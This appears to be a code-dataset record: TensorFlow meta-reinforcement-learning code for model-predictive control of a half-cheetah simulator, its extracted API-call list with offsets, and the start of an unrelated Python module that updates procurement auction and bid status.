self.center_adv = center_adv
self.positive_adv = positive_adv
self.store_paths = store_paths
self.whole_paths = whole_paths
self.fixed_horizon = fixed_horizon
self.load_policy = load_policy
self.scope = scope
self.num_samples = num_samples
self.s_size = self.env.observation_space.shape[0]
self.a_size = self.env.action_space.shape[0]
print(self.s_size, self.a_size)
self.lr = lr
self.fast_lr = fast_lr
self.loss_list = []
self.reward_list = []
self.fig = None
self.save_video = save_video
self.train_action_inputs, self.train_state_inputs, self.train_goal_inputs = [], [], []
self.test_action_inputs, self.test_state_inputs, self.test_goal_inputs = [], [], []
# select sampler
if singleton_pool.n_parallel >1:
self.sampler = ParrallelSampler(self, n_envs= self.meta_batch_size)
else:
self.sampler = VectorizedSampler(self, n_envs= self.meta_batch_size)
# define trainer
self.trainer = tf.train.AdamOptimizer(learning_rate=self.lr)
# this is a hacker
self.f_action_inputs, self.f_state_inputs, self.f_goal = construct_inputs(self.s_size, self.a_size, "first_test")
with tf.variable_scope("meta_rl_global"):
self.old_params = construct_fc_weights(self.s_size, self.s_size+ self.a_size, num_hidden= 512)
self.first_outputs = forward_fc(self.f_action_inputs, self.f_state_inputs, self.old_params, reuse= False)
self.f_loss = construct_loss(self.first_outputs, self.f_goal)
self.f_optimizer = self.trainer.minimize(self.f_loss)
# construct input tensors
self.construct_tensor_graph()
self.saver = tf.train.Saver()
def construct_tensor_graph(self):
'''
build maml final graph, directly optimize the initial prior model
:return:
'''
self.test_outputs, self.train_outputs, self.new_params, self.train_goal_inputs = [], [], [], []
# construct inputs and network for each meta task
for i in range(self.meta_batch_size):
tensor_action_inputs, tensor_state_inputs, tensor_goal_inputs = construct_inputs(a_size=self.a_size, s_size=self.s_size,
scpoe="train_inputs" + str(i))
outputs = forward_fc(tensor_action_inputs, tensor_state_inputs, weights=self.old_params,
reuse=True)
self.train_action_inputs.append(tensor_action_inputs)
self.train_state_inputs.append(tensor_state_inputs)
self.train_goal_inputs.append(tensor_goal_inputs)
self.train_outputs.append(outputs)
# maml train case, do first gradients
for i in range(self.meta_batch_size):
loss = construct_loss(self.train_outputs[i], self.train_goal_inputs[i])
grads = tf.gradients(loss, list(self.old_params.values()))
gradients = dict(zip(self.old_params.keys(), grads))
# save the params
self.new_params.append(dict(zip(self.old_params.keys(),
[self.old_params[key] - self.fast_lr * gradients[key] for key in
self.old_params.keys()])))
# maml test case, second order gradients
for i in range(self.meta_batch_size):
tensor_action_inputs, tensor_state_inputs, tensor_goal_inputs = construct_inputs(a_size=self.a_size, s_size=self.s_size,
scpoe="test_inputs" + str(i))
outputs = forward_fc(tensor_action_inputs, tensor_state_inputs, weights=self.new_params[i],
reuse=True)
self.test_action_inputs.append(tensor_action_inputs)
self.test_state_inputs.append(tensor_state_inputs)
self.test_goal_inputs.append(tensor_goal_inputs)
self.test_outputs.append(outputs)
self.cur_params = [self.old_params for i in range(self.meta_batch_size)]
# define total loss
self.total_loss_list = []
for i in range(self.meta_batch_size):
# save the params
self.total_loss_list.append(construct_loss(self.test_outputs[i], self.test_goal_inputs[i]))
with tf.variable_scope("total_loss"):
self.total_loss_before = tf.reduce_mean(tf.stack(self.total_loss_list))
self.second_gradients = self.trainer.minimize(self.total_loss_before, var_list= self.old_params)
def obtain_samples(self, itr, init_state, reset_args ):
paths = self.sampler.obtain_samples(itr,init_state = init_state,reset_args= reset_args, return_dict= True)
return paths
def process_samples(self, itr, path):
return self.sampler.process_samples(itr, path, log = False)
def update_target_graph(self, params, to_scope):
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
op_holder = []
for from_var, to_var in zip(params, to_vars):
op_holder.append(to_var.assign(from_var))
return op_holder
def cheetah_cost_fn(self,state, action, next_state):
if len(state.shape) > 1:
heading_penalty_factor = 10
scores = np.zeros((state.shape[0],))
# dont move front shin back so far that you tilt forward
front_leg = state[:, 5]
my_range = 0.2
scores[front_leg >= my_range] += heading_penalty_factor
front_shin = state[:, 6]
my_range = 0
scores[front_shin >= my_range] += heading_penalty_factor
front_foot = state[:, 7]
my_range = 0
scores[front_foot >= my_range] += heading_penalty_factor
scores -= (next_state[:, 17] - state[:, 17]) / 0.01 + 0.1 * (np.sum(action**2, axis=1))
return scores
heading_penalty_factor = 10
score = 0
# dont move front shin back so far that you tilt forward
front_leg = state[5]
my_range = 0.2
if front_leg >= my_range:
score += heading_penalty_factor
front_shin = state[6]
my_range = 0
if front_shin >= my_range:
score += heading_penalty_factor
front_foot = state[7]
my_range = 0
if front_foot >= my_range:
score += heading_penalty_factor
score -= (next_state[17] - state[17]) / 0.01 + 0.1 * (np.sum(action**2))
return score
def MPC(self,itr, num_samples, init_state, goal):
'''
# disable multiple joints
adv_list = np.zeros([num_samples])
old_obs = np.asarray([init_state for i in range(num_samples)])
new_obs = old_obs
for i in range(self.batch_size):
action = (np.random.rand(num_samples, self.a_size)-0.5)*2
action[:, goal] = 0.0
if i == 0:
action_list = action
diff = self.sess.run(self.first_outputs, feed_dict={self.f_state_inputs: np.asarray(new_obs).reshape([-1,self.s_size]),
self.f_action_inputs: np.asarray(action).reshape([-1,self.a_size])})
new_obs = diff + old_obs
rewards = diff[:,17]/0.01 - 0.05 * np.sum(np.square(action),axis=1)
adv_list[:] += rewards
index = np.argmax(adv_list)
return action_list[index]
'''
# multi friction
adv_list = np.zeros([num_samples])
old_obs = np.asarray([init_state for i in range(num_samples)])
new_obs = old_obs
for i in range(self.batch_size):
action = (np.random.rand(num_samples, self.a_size)-0.5)*2
if i == 0:
action_list = action
diff = self.sess.run(self.first_outputs, feed_dict={self.f_state_inputs: np.asarray(new_obs).reshape([-1,self.s_size]),
self.f_action_inputs: np.asarray(action).reshape([-1,self.a_size])})
new_obs = diff + old_obs
#angle = np.arccos(old_obs[:,0]/goal)
#rewards = -((((angle+np.pi) % (2*np.pi)) - np.pi) **2 + old_obs[:,2]**2*0.1 + 0.001* np.sum((action)**2))
rewards = diff[:,17]/0.01 - 0.05 * np.sum(np.square(action), axis=1)#self.cheetah_cost_fn(old_obs, action, new_obs)
adv_list[:] += rewards
index = np.argmax(adv_list)
return action_list[index]
def meta_online_train(self, goal):
'''
meta online adaption: load prior meta model, select action by doing MPC, adapt model in each step
:param goal: sample task
:return:
'''
self.goal = goal
self.sess = tf.Session()
with self.sess as sess:
self.summary_writer = tf.summary.FileWriter("./graph/", self.sess.graph)
loss_plot = None
loss_summary = tf.Summary()
loss_summary.value.add(tag='loss', simple_value=loss_plot)
reward_plot = None
reward_summary = tf.Summary()
reward_summary.value.add(tag = 'reward', simple_value = reward_plot)
diff_plot = None
diff_summary = tf.Summary()
diff_summary.value.add(tag='state_difference', simple_value=diff_plot)
if self.load_policy:
sess.run(tf.global_variables_initializer())
self.saver.restore(sess, tf.train.latest_checkpoint('./half_cheetah_model/'))
self.sampler.start_worker()
else:
sess.run(tf.global_variables_initializer())
self.sampler.start_worker()
self.env = self.env.wrapped_env
self.env.reset(reset_args=goal) # set the goal for env
nstep = 0
for itr in range(self.n_itr):
rewards = []
obs, act, diffs, images = [], [], [], []
new_state = self.env.reset()
for step in range(self.max_path_length):
#if step>int(self.max_path_length)*0.7:
# self.env.render()
if len(act) > 0:
indices = np.random.randint(0, len(act), len(act))
_ = sess.run([ self.f_optimizer],
feed_dict={self.f_action_inputs: np.asarray(act)[indices,:],
self.f_state_inputs: np.asarray(obs)[indices,:],
self.f_goal: np.asarray(diffs)[indices,:]})
loss, output = sess.run([self.f_loss,self.first_outputs], feed_dict={self.f_action_inputs: np.asarray(act)[indices,:],
self.f_state_inputs: np.asarray(obs)[indices,:],
self.f_goal: np.asarray(diffs)[indices,:]})
#diff = np.mean(abs(np.asarray(obs[1:-1])-np.asarray(obs[0:-2]) - output[0:-2]))
#diff_summary.value[0].simple_value = diff
loss_summary.value[0].simple_value = loss
self.summary_writer.add_summary(loss_summary, nstep)
self.summary_writer.add_summary(diff_summary, nstep)
obs.append(new_state)
if step%100 == 0:
print("Doing MPC, step:", step)
action = self.MPC(itr = itr, num_samples= self.num_samples, goal= goal, init_state= new_state)
new_obs, reward, done,_= self.env.step(action)
act.append(action)
diffs.append(new_obs - new_state)
rewards.append(reward)
nstep +=1
new_state = new_obs
if done:
break
if self.save_video:
from PIL import Image
image = self.env.wrapped_env.get_viewer().get_image()
pil_image = Image.frombytes('RGB', (image[1], image[2]), image[0])
images.append(np.flipud(np.array(pil_image)))
if self.save_video and itr == self.n_itr -1 :
import moviepy.editor as mpy
clip = mpy.ImageSequenceClip(images, fps=20 * 1)
clip.write_videofile("./video/half_cheetah/", fps=20 * 1)
self.saver.save(sess, './MPC_model/mpc_model.cpkt', global_step=itr)
if itr >= 0:
sum_rewards = np.sum(np.asarray(rewards))
print(sum_rewards)
self.reward_list.append(sum_rewards)
reward_summary.value[0].simple_value = sum_rewards
self.summary_writer.add_summary(reward_summary, itr)
if self.fig == None :
self.fig = plt.figure()
self.fig.set_size_inches(12, 6)
self.fig1= plt.figure()
else:
self.show_rewards(self.reward_list, self.fig, "rewards")
def train(self):
'''
meta training of transition model : sample trajectories based on different tasks, doing optimization
:return:
'''
self.sess = tf.Session()
with self.sess as sess:
self.summary_writer = tf.summary.FileWriter("./graph/", self.sess.graph)
if self.load_policy:
sess.run(tf.global_variables_initializer())
self.saver.restore(sess, tf.train.latest_checkpoint('./half_cheetah_model/'))
self.sampler.start_worker()
else:
sess.run(tf.global_variables_initializer())
self.sampler.start_worker()
self.env = self.env.wrapped_env
loss_plot = None
loss_summary = tf.Summary()
loss_summary.value.add(tag='loss', simple_value=loss_plot)
reward_plot = None
reward_summary = tf.Summary()
reward_summary.value.add(tag = 'reward', simple_value = reward_plot)
for itr in range(self.n_itr):
if itr>0:
print("------------------ total loss: %f" % total_loss_before)
print("------------------ total loss: %f" % total_loss)
# set goals of meta tasks
learner_goals = self.env.sample_goals(self.meta_batch_size)
obs_list, action_list, adv_list, newobs_list, newaction_list, newadv_list = [], [], [], [], [], []
for step in range(self.num_grad_updates+1):
print("-------------------- step: " + str(step))
print("-------------------- obtaining samples :")
paths = self.obtain_samples(itr, reset_args= learner_goals,init_state= None)
print("-------------------- processing samples :")
samples = {}
for key in paths.keys():
samples[key] = self.process_samples(itr, paths[key])
if step == 0:
for i in range(self.meta_batch_size):
inputs = ext.extract(
samples[i],
"observations", "actions", "rewards"
)
obs_list.append(inputs[0])
action_list.append(inputs[1])
adv_list.append(np.asarray(inputs[2]).reshape([-1,1]))
else:
for i in range(self.meta_batch_size):
inputs = ext.extract(
samples[i],
"observations", "actions", "rewards"
)
newobs_list.append(inputs[0])
newaction_list.append(inputs[1])
newadv_list.append(np.asarray(inputs[2]).reshape([-1,1]))
#if step == 0:
# print("-------------------- Compute local gradients : ")
# # apply first gradients, optimize original params
# assign_op = []
print("-------------------------- optimize policy :")
feedict = {}
for i in range(self.meta_batch_size):
feedict.update({self.train_action_inputs[i]: action_list[i][0:-1]})
feedict.update({self.train_state_inputs[i]: obs_list[i][0:-1]})
feedict.update({self.train_goal_inputs[i]: obs_list[i][1::] - obs_list[i][0:-1]})
feedict.update({self.test_action_inputs[i]: newaction_list[i][0:-1]})
feedict.update({self.test_state_inputs[i]: newobs_list[i][0:-1]})
feedict.update({self.test_goal_inputs[i]: newobs_list[i][1::] - newobs_list[i][0:-1] })
total_loss_before= sess.run(self.total_loss_before, feed_dict= feedict)
_ = sess.run([ self.second_gradients], feed_dict= feedict)
total_loss = sess.run(self.total_loss_before,
feed_dict=feedict)
if itr > 0:
self.loss_list.append(total_loss_before)
reward_summary.value[0].simple_value = total_loss_before
self.summary_writer.add_summary(reward_summary, itr)
if self.fig == None :
self.fig = plt.figure()
self.fig.set_size_inches(12, 6)
else:
self.show_rewards(self.loss_list, self.fig, "loss")
if itr%1 == 0:
save_path = self.saver.save(sess, './half_cheetah_model/maml_model.ckpt', global_step = itr)
print("-------------save model : %s " % save_path)
self.sampler.shutdown_worker()
def show_rewards(self, rewards, fig, name,width=12, height=6, window_size=1000):
# sanity checks for plotting
assert (fig is not None)
#if len(rewards) == 0:
# return
plt.figure(fig.number)
plt.clf()
moving_avg = self.compute_moving_average(rewards, window_size)
gcf = plt.gcf()
ax = plt.gca()
gcf.set_size_inches(width, height)
plt.xlim((0, len(rewards)))
r, = plt.plot(rewards, color='red', linestyle='-', linewidth=0.5, label=name, alpha=0.5)
ave_r, = plt.plot(moving_avg, color='blue', linestyle='-', linewidth=0.8, label='avg_' + name)
# e, = plt.plot(epsilons, color='blue', linestyle='--', alpha=0.5, label='epsilon')
plt.legend([r, ave_r], [name, 'average '+ name])
plt.ylabel(name)
plt.xlabel('Episode #')
plt.savefig(name+' fig')
#plt.pause(0.1)
def compute_moving_average(self, rewards, window):
cur_window_size = 1
moving_average = []
for i in range(len(rewards) - 1):
lower_idx = max(0, i - cur_window_size)
average = sum(rewards[lower_idx:i + 1]) / cur_window_size
moving_average.append(average)
cur_window_size += 1
if cur_window_size > window:
cur_window_size = window
return moving_average
def get_param_values(self):
all_params = self.old_params
param_values = tf.get_default_session().run(all_params)
return param_values
def set_param_values(self, params):
tf.get_default_session().run(self.update_target_graph(params, "meta_rl" + str(i)))
def _discount(self, x, gamma):
return signal.lfilter([1.0], [1.0, gamma], x[::-1])[::-1]
def add_params(self, param_1, param_2):
if len(param_1) == 0:
return param_2
return [param_1[i] + param_2[i] for i in range(len(param_1))]
def sub_params(self, param_1, param_2):
return [param_1[i] - param_2[i] for i in range(len(param_1))]
def mult_params(self, param_1, param_2 ):
return [param_1[i] - param_2[i] for i in range(len(param_1))]
def divide_nums(self, param_1, num):
return [param_1[i]/num for i in range(len(param_1))]
| [
"numpy.random.rand",
"matplotlib.pyplot.ylabel",
"tensorflow.get_default_session",
"numpy.array",
"self_implement_learning_to_adapt.model.construct_inputs",
"self_implement_learning_to_adapt.vectorized_sampler.VectorizedSampler",
"matplotlib.pyplot.xlabel",
"tensorflow.Session",
"matplotlib.pyplot.p... | [((2881, 2926), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {'learning_rate': 'self.lr'}), '(learning_rate=self.lr)\n', (2903, 2926), True, 'import tensorflow as tf\n'), ((3020, 3076), 'self_implement_learning_to_adapt.model.construct_inputs', 'construct_inputs', (['self.s_size', 'self.a_size', '"""first_test"""'], {}), "(self.s_size, self.a_size, 'first_test')\n", (3036, 3076), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((3263, 3350), 'self_implement_learning_to_adapt.model.forward_fc', 'forward_fc', (['self.f_action_inputs', 'self.f_state_inputs', 'self.old_params'], {'reuse': '(False)'}), '(self.f_action_inputs, self.f_state_inputs, self.old_params,\n reuse=False)\n', (3273, 3350), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((3370, 3417), 'self_implement_learning_to_adapt.model.construct_loss', 'construct_loss', (['self.first_outputs', 'self.f_goal'], {}), '(self.first_outputs, self.f_goal)\n', (3384, 3417), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((3575, 3591), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (3589, 3591), True, 'import tensorflow as tf\n'), ((6827, 6888), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.TRAINABLE_VARIABLES', 'to_scope'], {}), '(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)\n', (6844, 6888), True, 'import tensorflow as tf\n'), ((9426, 9449), 'numpy.zeros', 'np.zeros', (['[num_samples]'], {}), '([num_samples])\n', (9434, 9449), True, 'import numpy as np\n'), ((10365, 10384), 'numpy.argmax', 'np.argmax', (['adv_list'], {}), '(adv_list)\n', (10374, 10384), True, 'import numpy as np\n'), ((10685, 10697), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (10695, 10697), True, 'import tensorflow as tf\n'), ((15384, 15396), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (15394, 15396), True, 'import tensorflow as tf\n'), ((20367, 20389), 'matplotlib.pyplot.figure', 'plt.figure', (['fig.number'], {}), '(fig.number)\n', (20377, 20389), True, 'import matplotlib.pyplot as plt\n'), ((20398, 20407), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (20405, 20407), True, 'import matplotlib.pyplot as plt\n'), ((20493, 20502), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (20500, 20502), True, 'import matplotlib.pyplot as plt\n'), ((20516, 20525), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (20523, 20525), True, 'import matplotlib.pyplot as plt\n'), ((20618, 20705), 'matplotlib.pyplot.plot', 'plt.plot', (['rewards'], {'color': '"""red"""', 'linestyle': '"""-"""', 'linewidth': '(0.5)', 'label': 'name', 'alpha': '(0.5)'}), "(rewards, color='red', linestyle='-', linewidth=0.5, label=name,\n alpha=0.5)\n", (20626, 20705), True, 'import matplotlib.pyplot as plt\n'), ((20719, 20809), 'matplotlib.pyplot.plot', 'plt.plot', (['moving_avg'], {'color': '"""blue"""', 'linestyle': '"""-"""', 'linewidth': '(0.8)', 'label': "('avg_' + name)"}), "(moving_avg, color='blue', linestyle='-', linewidth=0.8, label=\n 'avg_' + name)\n", (20727, 20809), True, 'import matplotlib.pyplot as plt\n'), ((20905, 20954), 'matplotlib.pyplot.legend', 'plt.legend', (['[r, ave_r]', "[name, 'average ' + name]"], {}), "([r, ave_r], [name, 'average ' + name])\n", (20915, 20954), True, 'import matplotlib.pyplot as plt\n'), ((20962, 20978), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['name'], {}), '(name)\n', (20972, 20978), True, 'import matplotlib.pyplot as plt\n'), ((20987, 21010), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Episode #"""'], {}), "('Episode #')\n", (20997, 21010), True, 'import matplotlib.pyplot as plt\n'), ((21019, 21045), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(name + ' fig')"], {}), "(name + ' fig')\n", (21030, 21045), True, 'import matplotlib.pyplot as plt\n'), ((2684, 2735), 'self_implement_learning_to_adapt.batch_sampler.ParrallelSampler', 'ParrallelSampler', (['self'], {'n_envs': 'self.meta_batch_size'}), '(self, n_envs=self.meta_batch_size)\n', (2700, 2735), False, 'from self_implement_learning_to_adapt.batch_sampler import ParrallelSampler\n'), ((2778, 2830), 'self_implement_learning_to_adapt.vectorized_sampler.VectorizedSampler', 'VectorizedSampler', (['self'], {'n_envs': 'self.meta_batch_size'}), '(self, n_envs=self.meta_batch_size)\n', (2795, 2830), False, 'from self_implement_learning_to_adapt.vectorized_sampler import VectorizedSampler\n'), ((3090, 3125), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""meta_rl_global"""'], {}), "('meta_rl_global')\n", (3107, 3125), True, 'import tensorflow as tf\n'), ((3157, 3233), 'self_implement_learning_to_adapt.model.construct_fc_weights', 'construct_fc_weights', (['self.s_size', '(self.s_size + self.a_size)'], {'num_hidden': '(512)'}), '(self.s_size, self.s_size + self.a_size, num_hidden=512)\n', (3177, 3233), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((4213, 4308), 'self_implement_learning_to_adapt.model.forward_fc', 'forward_fc', (['tensor_action_inputs', 'tensor_state_inputs'], {'weights': 'self.old_params', 'reuse': '(True)'}), '(tensor_action_inputs, tensor_state_inputs, weights=self.\n old_params, reuse=True)\n', (4223, 4308), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((4687, 4751), 'self_implement_learning_to_adapt.model.construct_loss', 'construct_loss', (['self.train_outputs[i]', 'self.train_goal_inputs[i]'], {}), '(self.train_outputs[i], self.train_goal_inputs[i])\n', (4701, 4751), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((5522, 5620), 'self_implement_learning_to_adapt.model.forward_fc', 'forward_fc', (['tensor_action_inputs', 'tensor_state_inputs'], {'weights': 'self.new_params[i]', 'reuse': '(True)'}), '(tensor_action_inputs, tensor_state_inputs, weights=self.\n new_params[i], reuse=True)\n', (5532, 5620), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((6221, 6252), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""total_loss"""'], {}), "('total_loss')\n", (6238, 6252), True, 'import tensorflow as tf\n'), ((7198, 7225), 'numpy.zeros', 'np.zeros', (['(state.shape[0],)'], {}), '((state.shape[0],))\n', (7206, 7225), True, 'import numpy as np\n'), ((10765, 10815), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (['"""./graph/"""', 'self.sess.graph'], {}), "('./graph/', self.sess.graph)\n", (10786, 10815), True, 'import tensorflow as tf\n'), ((10873, 10885), 'tensorflow.Summary', 'tf.Summary', ([], {}), '()\n', (10883, 10885), True, 'import tensorflow as tf\n'), ((11017, 11029), 'tensorflow.Summary', 'tf.Summary', ([], {}), '()\n', (11027, 11029), True, 'import tensorflow as tf\n'), ((11167, 11179), 'tensorflow.Summary', 'tf.Summary', ([], {}), '()\n', (11177, 11179), True, 'import tensorflow as tf\n'), ((15464, 15514), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (['"""./graph/"""', 'self.sess.graph'], {}), "('./graph/', self.sess.graph)\n", (15485, 15514), True, 'import tensorflow as tf\n'), ((15968, 15980), 'tensorflow.Summary', 'tf.Summary', ([], {}), '()\n', (15978, 15980), True, 'import tensorflow as tf\n'), ((16112, 16124), 'tensorflow.Summary', 'tf.Summary', ([], {}), '()\n', (16122, 16124), True, 'import tensorflow as tf\n'), ((21877, 21921), 'scipy.signal.lfilter', 'signal.lfilter', (['[1.0]', '[1.0, gamma]', 'x[::-1]'], {}), '([1.0], [1.0, gamma], x[::-1])\n', (21891, 21921), True, 'import scipy.signal as signal\n'), ((6144, 6206), 'self_implement_learning_to_adapt.model.construct_loss', 'construct_loss', (['self.test_outputs[i]', 'self.test_goal_inputs[i]'], {}), '(self.test_outputs[i], self.test_goal_inputs[i])\n', (6158, 6206), False, 'from self_implement_learning_to_adapt.model import construct_fc_weights, construct_inputs, construct_loss, forward_fc\n'), ((6306, 6336), 'tensorflow.stack', 'tf.stack', (['self.total_loss_list'], {}), '(self.total_loss_list)\n', (6314, 6336), True, 'import tensorflow as tf\n'), ((8397, 8416), 'numpy.sum', 'np.sum', (['(action ** 2)'], {}), '(action ** 2)\n', (8403, 8416), True, 'import numpy as np\n'), ((21625, 21649), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (21647, 21649), True, 'import tensorflow as tf\n'), ((21743, 21767), 'tensorflow.get_default_session', 'tf.get_default_session', ([], {}), '()\n', (21765, 21767), True, 'import tensorflow as tf\n'), ((7767, 7794), 'numpy.sum', 'np.sum', (['(action ** 2)'], {'axis': '(1)'}), '(action ** 2, axis=1)\n', (7773, 7794), True, 'import numpy as np\n'), ((9610, 9650), 'numpy.random.rand', 'np.random.rand', (['num_samples', 'self.a_size'], {}), '(num_samples, self.a_size)\n', (9624, 9650), True, 'import numpy as np\n'), ((11323, 11356), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (11354, 11356), True, 'import tensorflow as tf\n'), ((11399, 11450), 'tensorflow.train.latest_checkpoint', 'tf.train.latest_checkpoint', (['"""./half_cheetah_model/"""'], {}), "('./half_cheetah_model/')\n", (11425, 11450), True, 'import tensorflow as tf\n'), ((11539, 11572), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (11570, 11572), True, 'import tensorflow as tf\n'), ((14351, 14392), 'moviepy.editor.ImageSequenceClip', 'mpy.ImageSequenceClip', (['images'], {'fps': '(20 * 1)'}), '(images, fps=20 * 1)\n', (14372, 14392), True, 'import moviepy.editor as mpy\n'), ((15573, 15606), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (15604, 15606), True, 'import tensorflow as tf\n'), ((15649, 15700), 'tensorflow.train.latest_checkpoint', 'tf.train.latest_checkpoint', (['"""./half_cheetah_model/"""'], {}), "('./half_cheetah_model/')\n", (15675, 15700), True, 'import tensorflow as tf\n'), ((15789, 15822), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (15820, 15822), True, 'import tensorflow as tf\n'), ((10239, 10256), 'numpy.square', 'np.square', (['action'], {}), '(action)\n', (10248, 10256), True, 'import numpy as np\n'), ((14087, 14141), 'PIL.Image.frombytes', 'Image.frombytes', (['"""RGB"""', '(image[1], image[2])', 'image[0]'], {}), "('RGB', (image[1], image[2]), image[0])\n", (14102, 14141), False, 'from PIL import Image\n'), ((14627, 14646), 'numpy.asarray', 'np.asarray', (['rewards'], {}), '(rewards)\n', (14637, 14646), True, 'import numpy as np\n'), ((14967, 14979), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (14977, 14979), True, 'import matplotlib.pyplot as plt\n'), ((15071, 15083), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (15081, 15083), True, 'import matplotlib.pyplot as plt\n'), ((19720, 19732), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (19730, 19732), True, 'import matplotlib.pyplot as plt\n'), ((17331, 17392), 'rllab.misc.ext.extract', 'ext.extract', (['samples[i]', '"""observations"""', '"""actions"""', '"""rewards"""'], {}), "(samples[i], 'observations', 'actions', 'rewards')\n", (17342, 17392), False, 'from rllab.misc import ext\n'), ((17809, 17870), 'rllab.misc.ext.extract', 'ext.extract', (['samples[i]', '"""observations"""', '"""actions"""', '"""rewards"""'], {}), "(samples[i], 'observations', 'actions', 'rewards')\n", (17820, 17870), False, 'from rllab.misc import ext\n'), ((9803, 9822), 'numpy.asarray', 'np.asarray', (['new_obs'], {}), '(new_obs)\n', (9813, 9822), True, 'import numpy as np\n'), ((9932, 9950), 'numpy.asarray', 'np.asarray', (['action'], {}), '(action)\n', (9942, 9950), True, 'import numpy as np\n'), ((14190, 14209), 'numpy.array', 'np.array', (['pil_image'], {}), '(pil_image)\n', (14198, 14209), True, 'import numpy as np\n'), ((12332, 12347), 'numpy.asarray', 'np.asarray', (['act'], {}), '(act)\n', (12342, 12347), True, 'import numpy as np\n'), ((12436, 12451), 'numpy.asarray', 'np.asarray', (['obs'], {}), '(obs)\n', (12446, 12451), True, 'import numpy as np\n'), ((12532, 12549), 'numpy.asarray', 'np.asarray', (['diffs'], {}), '(diffs)\n', (12542, 12549), True, 'import numpy as np\n'), ((12678, 12693), 'numpy.asarray', 'np.asarray', (['act'], {}), '(act)\n', (12688, 12693), True, 'import numpy as np\n'), ((12782, 12797), 'numpy.asarray', 'np.asarray', (['obs'], {}), '(obs)\n', (12792, 12797), True, 'import numpy as np\n'), ((12878, 12895), 'numpy.asarray', 'np.asarray', (['diffs'], {}), '(diffs)\n', (12888, 12895), True, 'import numpy as np\n'), ((17644, 17665), 'numpy.asarray', 'np.asarray', (['inputs[2]'], {}), '(inputs[2])\n', (17654, 17665), True, 'import numpy as np\n'), ((18131, 18152), 'numpy.asarray', 'np.asarray', (['inputs[2]'], {}), '(inputs[2])\n', (18141, 18152), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
from logging import getLogger
from pkg_resources import get_distribution
from openprocurement.auctions.core.plugins.contracting.base.utils import (
check_auction_status
)
from openprocurement.auctions.core.utils import (
cleanup_bids_for_cancelled_lots, check_complaint_status,
remove_draft_bids,
context_unpack,
get_now,
TZ,
)
PKG = get_distribution(__package__)
LOGGER = getLogger(PKG.project_name)
def check_bids(request):
auction = request.validated['auction']
if auction.lots:
[setattr(i.auctionPeriod, 'startDate', None) for i in auction.lots if i.numberOfBids < 2 and i.auctionPeriod and i.auctionPeriod.startDate]
[setattr(i, 'status', 'unsuccessful') for i in auction.lots if i.numberOfBids < 2 and i.status == 'active']
cleanup_bids_for_cancelled_lots(auction)
if not set([i.status for i in auction.lots]).difference(set(['unsuccessful', 'cancelled'])):
auction.status = 'unsuccessful'
else:
if auction.auctionPeriod:
if auction.numberOfBids < auction.minNumberOfQualifiedBids:
auction.auctionPeriod.startDate = None
auction.status = 'unsuccessful'
elif auction.numberOfBids == 1:
auction.auctionPeriod.startDate = None
request.content_configurator.start_awarding()
def check_status(request):
auction = request.validated['auction']
now = get_now()
for complaint in auction.complaints:
check_complaint_status(request, complaint, now)
for award in auction.awards:
request.content_configurator.check_award_status(request, award, now)
for complaint in award.complaints:
check_complaint_status(request, complaint, now)
if not auction.lots and auction.status == 'active.tendering' and auction.tenderPeriod.endDate <= now:
LOGGER.info('Switched auction {} to {}'.format(auction['id'], 'active.auction'),
extra=context_unpack(request, {'MESSAGE_ID': 'switched_auction_active.auction'}))
auction.status = 'active.auction'
remove_draft_bids(request)
check_bids(request)
return
elif auction.lots and auction.status == 'active.tendering' and auction.tenderPeriod.endDate <= now:
LOGGER.info('Switched auction {} to {}'.format(auction['id'], 'active.auction'),
extra=context_unpack(request, {'MESSAGE_ID': 'switched_auction_active.auction'}))
auction.status = 'active.auction'
remove_draft_bids(request)
check_bids(request)
[setattr(i.auctionPeriod, 'startDate', None) for i in auction.lots if i.numberOfBids < 2 and i.auctionPeriod]
return
elif not auction.lots and auction.status == 'active.awarded':
standStillEnds = [
a.complaintPeriod.endDate.astimezone(TZ)
for a in auction.awards
if a.complaintPeriod.endDate
]
if not standStillEnds:
return
standStillEnd = max(standStillEnds)
if standStillEnd <= now:
check_auction_status(request)
elif auction.lots and auction.status in ['active.qualification', 'active.awarded']:
if any([i['status'] in auction.block_complaint_status and i.relatedLot is None for i in auction.complaints]):
return
for lot in auction.lots:
